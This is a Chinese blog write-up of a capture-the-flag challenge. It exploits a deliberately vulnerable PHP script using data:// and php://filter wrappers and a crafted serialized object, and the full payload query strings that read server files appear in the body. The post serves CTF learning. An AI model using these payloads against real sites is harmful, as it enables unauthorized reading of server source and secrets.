BUUCTF之[ZJCTF 2019]NiZhuanSiWei -------------- php和data伪协议,和反序列化

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量565 收藏
点赞数
分类专栏: 反序列化/序列化 伪协议 CTF-WEB 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/118852578
版权

BUUCTF之[ZJCTF 2019]NiZhuanSiWei

知识点: PHP伪协议

  • php://filter
  • data://

题目:

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

这题有三个关键点,需要分别绕过。
第一个绕过:

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

这里可以用data或者是input伪协议绕过,比如:

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

其中这里的data://text/plain是data伪协议的写法,base64是表示用base64编码的意思,d2VsY29tZSB0byB0aGUgempjdGY=是welcome to the zjctf经过base64加密后得到的。

第二个绕过:

include($file);  //useless.php

这里提示我们要先读取useless.php这个文件,这里用php://filter伪协议

file=php://filter/read=convert.base64-encode/resource=useless.php

其中这里的php://filter/read=convert.base64-encode/resource=你可以理解为固定写法,useless.php为要读取的文件

·
·
·
所以组合上面的两个关键点,先读取useless.php看看有没有上面提示

?file=php://filter/read=convert.base64-encode/resource=useless.php
&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

在这里插入图片描述
得到的base64加密后的数据:
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

将上面base64解码后得到另一方后台代码:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第三个绕过:
嗯!虽然不是很懂,但是在php里看到class就知道接下来是反序列化的知识点(纯属做题经验)
所以这里构造反序列化payload:

password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
  • O:4:“Flag”:1: // 这里表示构造一个对象,对象的名字为Flag(4个字符),并且这个对象里有一个变量
  • s:4:“file”; // 这里表示对象变量的名为:file(4个字符)
  • s:8:“flag.php”; // 这里表示对象变量的值为:flag.php(8个字符)

所以整合上面的三个知识点得到Payload:

?file=php://filter/read=convert.base64-encode/resource=useless.php
&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

但是很可惜,这个Payload并不能得到Flag(这里让我很迷惑!)。看了别人的WP才知道:
这里需要把file=php://filter/read=convert.base64-encode/resource=useless.php
改成file=useless.php才可以得到Flag

?file=useless.php
&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述
在这里插入图片描述

总结:
这题很久之前做过一次,但是当时根本不知道怎么下手。所以看了别人的解题思路自己再做一边。后来又接触过几次PHP伪协议和反序列化的知识点,加深了印象。所以这次再做该题的时候并没有想当初那样看都看不懂。。。可以说是学到东西了!

若丶时光破灭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
php伪协议
weixin_52159400的博客
08-17 525
涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data://等。在此之前我们先要了解allow_url_include和allow_url_fopen两个配置含义。allow_url_fopen = On (允许打开URL文件,预设启用)allow_url_fopen = Off (禁止打开URL文件)......
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化
m0_55854679的博客
08-23 1944
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议data伪协议、file伪协议)
2401_84208172的博客
05-24 1153
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
[ZJCTF 2019]NiZhuanSiWei (__tostring反序列化data和filter伪协议)
开心星人的博客
08-15 537
接下来想要查看useless.php的内容,直接访问是一块白板,查看源码也什么都没有。(因为php代码并没有写在注释中,所以我们查看源码看不到;并且这串php代码也跟页面渲染无关,所以我们看到的页面是白板)所以我们可以使用php://filter伪协议查看源码。这里我们肯定不存在一个文件,并且该文件的内容为。所以会调用__tostring()函数。所以可以使用data伪协议进行绕过。...
buuctf 基础sql Group_concat() 伪协议 ᴬᴰᴹᴵᴺUnicode欺骗 各种绕过(内敛绕过) 菜刀
carol2358的博客
08-16 664
[极客大挑战 2019]LoveSQL + 表示空格(在URL中不能使用空格) %2B / 分隔目录和子目录 %2F ? 分隔实际的URL和参数 %3F # 表示书签 %23 & URL中指定的参数间的分隔符...
Buuctf web真题1(php伪协议&Rce过滤绕过&md5()小bug&http)
weixin_63231007的博客
04-05 2081
[ACTF2020 新生赛]Include 考察利用php://filter伪协议进行文件包含 首先尝试php://input伪协议: 发现被过滤。 然后尝试使用php://filter伪协议来继续包含, 构造playloads:php://filter/read=convert.base64-encode/resource=flag.php 得到base码。 将其进行解码,得到flag。 ......
uni-app uni-data-picker 省市区数据表
06-16
<uni-data-picker> 是一个选择类datacom组件。支持多列级联选择。列数没有限制,如果屏幕显示不全,顶部tab区域会左右滚动。 适用于uni-app使用uni-data-picker实现省市区选择器的json数据
CIC-DDoS2019-Detection
最新发布
06-18
数据清洗与合并 Data Cleaning and Merging ; 机器学习模型 Machine Learning Models; 深度学习模型 Deep Learning Models ; PCA, t-SNE分析 PCA, t-SNE Analysis; 数据,结果可视化 Data and Results ...
jackson-dataformat-smile/yam-2.11.4.jar
09-28
jackson-dataformat-smile-2.11.4.jar jackson-dataformat-yam-2.11.4.jar 这俩jar包在服务运行的时候显示读取失败,拷贝到自己的maven仓库的 \com\fasterxml\jackson\dataformat\jackson-dataformat-smile\2.11.4 ...
常用塑胶材料及基本性能-data分解
12-14
常用塑胶材料及基本性能--data分解常用塑胶材料及基本性能--data分解常用塑胶材料及基本性能--data分解常用塑胶材料及基本性能--data分解常用塑胶材料及基本性能--data分解常用塑胶材料及基本性能--data分解常用塑胶...
ES9603Q-Datasheet-v0.4.1-1
03-13
ES9603Q-Datasheet-v0.4.1-1
filter和data伪协议
2301_79880442的博客
04-01 543
data://伪协议,是数据流封装器,和php://相似,都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过包含你输入的payload来实现目的。一个类Flag,有一个公有变量file,有tostring魔术方法,该魔术方法在将对象当成字符串调用时触发,使用到 file_get_contents($this->file);所有直接构造:password=O:4:"Flag":1:{s:4:"file";
NiZhuanSiWei-[ZJCTF 2019]-[PHP伪协议]-[传送门->BUUCTF]
qwsn
11-24 1640
0x01、Web 1.NiZhuanSiWei-[ZJCTF 2019]-[PHP伪协议]-[传送门->BUUCTF] 第一步:打开环境,点击题目链接,进行代码审计 <?php $text = $_GET["text"]; //GET传参:text $file = $_GET["file"]; //GET传参:file $password = $_GET["password"]; //GET传参:password if(isset($text)&&(file_get_
使用data伪协议绕过圆括号、反引号被过滤
weixin_39514626的博客
06-12 1986
data协议常用数据格式 不使用编码的方式绕过圆括号过滤 环境是https://xss.haozi.me/#/0x04 ,其中代码过滤了中括号、圆括号、反引号。于是尝试了编码绕过,使用实体编码之后很容易就绕过了。 function render (input) { const stripBracketsRe = /[()`]/g input = input.replace(stripBracketsRe, '') return input } 但是是不是还有其他的方法可以绕过呢,因为在实际测
一天一道ctf 第16天(data伪协议,异或sql注入)
scrawman的博客
03-29 2014
看到unserialize()函数觉得是反序列化的题,但是没有看到class的定义。作者这边提示了useless.php,那就用filter伪协议读一下看看。?file=php://filter/read=convert.base64-encode/resource=useless.php,没有反应,忘记了前面text也要绕过。 text的值可以用data伪协议输入,?text=data:text/plain,welcome to the zjctf&file=php://filter/read=.
[BJDCTF2020]ZJCTF,不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 480
伪协议常用在文件包含漏洞中. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
PHP封装伪协议data
m0_73720136的博客
05-08 776
通过本实验,利用PHP封装伪协议中的data流,进行代码执行和系统命令执行,也可以对代码进行base64编码,同样可以执行一句话木马,从而Getshell。
javascript伪协议
htmld的专栏
06-11 1017
伪协议不同于因特网上所真实存在的如http://,https://,ftp://,而是为关联应用程序而使用的.如:tencent://(关联QQ),data:(用base64编码来在浏览器端输出二进制文件),还有就是javascript: 我们可以在浏览地址栏里输入"javascript:alert('JS!');",点转到后会发现,实际上是把javascript:后面的代码当JavaScrip
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 9539
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
Microsoft PL-300 Microsoft Power BI Data Analyst
09-06
"Microsoft PL-300是微软认证的一项针对Power BI数据分析师的考试,该考试涵盖了广泛的Power BI使用和分析技能。考试在2023年7月10日进行了更新,由微软官方提供。考试时长为2小时,包含232个问题,涉及14个主题和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值